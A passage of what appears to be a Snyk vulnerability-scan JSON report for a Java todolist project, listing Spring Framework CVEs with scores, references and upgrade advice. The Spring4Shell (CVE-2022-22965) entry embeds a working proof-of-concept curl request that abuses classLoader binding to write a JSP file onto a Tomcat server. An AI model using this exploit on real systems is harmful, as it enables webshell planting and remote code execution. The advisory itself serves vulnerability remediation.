+ { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:22.626014Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", + "epssDetails": { + "percentile": "0.48906", + "probability": "0.00133", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20861" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-03-23T12:26:39.837900Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-23T11:49:46Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-03-23T12:37:13.052190Z", + 
"severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.291695Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Google OSS-Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,5.2.24.RELEASE)", + "[5.3.0,5.3.27)", + "[6.0.0,6.0.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.24.RELEASE", + "5.3.27", + "6.0.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20863", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "cvssSources": [ 
+ { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:15.433654Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", + "epssDetails": { + "percentile": "0.70100", + "probability": "0.00306", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20863" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-04-14T06:33:20.884492Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-04-14T06:25:45Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, 
+ "publicationTime": "2023-04-14T06:33:21.063044Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:09.820460Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ] + }, + "exploit": "High", + "fixedIn": [ + "5.2.20", + "5.3.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "filePath": "org/springframework/beans/CachedIntrospectionResults.java", + "className": "CachedIntrospectionResults", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", + "title": "CyberKendra Post" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", + "title": "GitHub Commit" + }, + { + "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", + "title": "LunaSec Blog" + }, + { + "url": "https://blog.payara.fish/payara-and-spring4shell", + "title": "Payara Blogpost" + }, + { + "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", + "title": "Payara PoC" + }, + { + "url": 
"https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", + "title": "Snyk Blog - Technical Breakdown" + }, + { + "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", + "title": "Snyk PoC" + }, + { + "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", + "title": "Spring Security Announcement" + }, + { + "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", + "title": "Spring Tomcat Mitigation Advice" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-30T15:25:03.231650Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "description": "## 
Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). 
\r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited 
Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", + "epssDetails": { + "percentile": "0.99975", + "probability": "0.97485", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22965" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-03-30T21:42:31.436000Z", + "functions_new": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "className": "org.springframework.beans.CachedIntrospectionResults", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-30T21:42:24Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-03-30T22:32:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:17.474380Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Rob Ryan" + ], + "semver": { + "vulnerable": [ + "[,5.2.22.RELEASE)", + 
"[5.3.0,5.3.20)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.22.RELEASE", + "5.3.20" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", + "title": "GitHub Commit" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22970", + "title": "Tanzu vmware" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:21.626910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "description": "## 
Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", + "epssDetails": { + "percentile": "0.75300", + "probability": "0.00449", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22970" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-05-12T08:45:35.744127Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-12T08:17:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-05-12T09:49:10.833602Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:48.407397Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "title": "Improper Handling of Case Sensitivity", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.2.21)", + "[5.3.0, 5.3.19)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "5.2.21", + "5.3.19" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-context", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28333", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/MarcinGadz/spring-rce-poc", + "title": "PoC" + }, + { + "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", + "title": "Spring Blog Post" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22968", + "title": "Tanzu Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.233852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.822810Z" + 
}, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", + "epssDetails": { + "percentile": "0.29205", + "probability": "0.00065", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22968" + ], + "CWE": [ + "CWE-178" + ] + }, + "packageName": "org.springframework:spring-context", + "proprietary": false, + "creationTime": "2022-04-14T11:54:10.207823Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-14T11:43:54Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-context" + }, + "publicationTime": 
"2022-04-14T12:09:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:16.458425Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-context", + "version": "3.2.6.RELEASE" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.aspectj:aspectjweaver", + "version": "1.8.2" + }, + { + "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + 
"org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": 
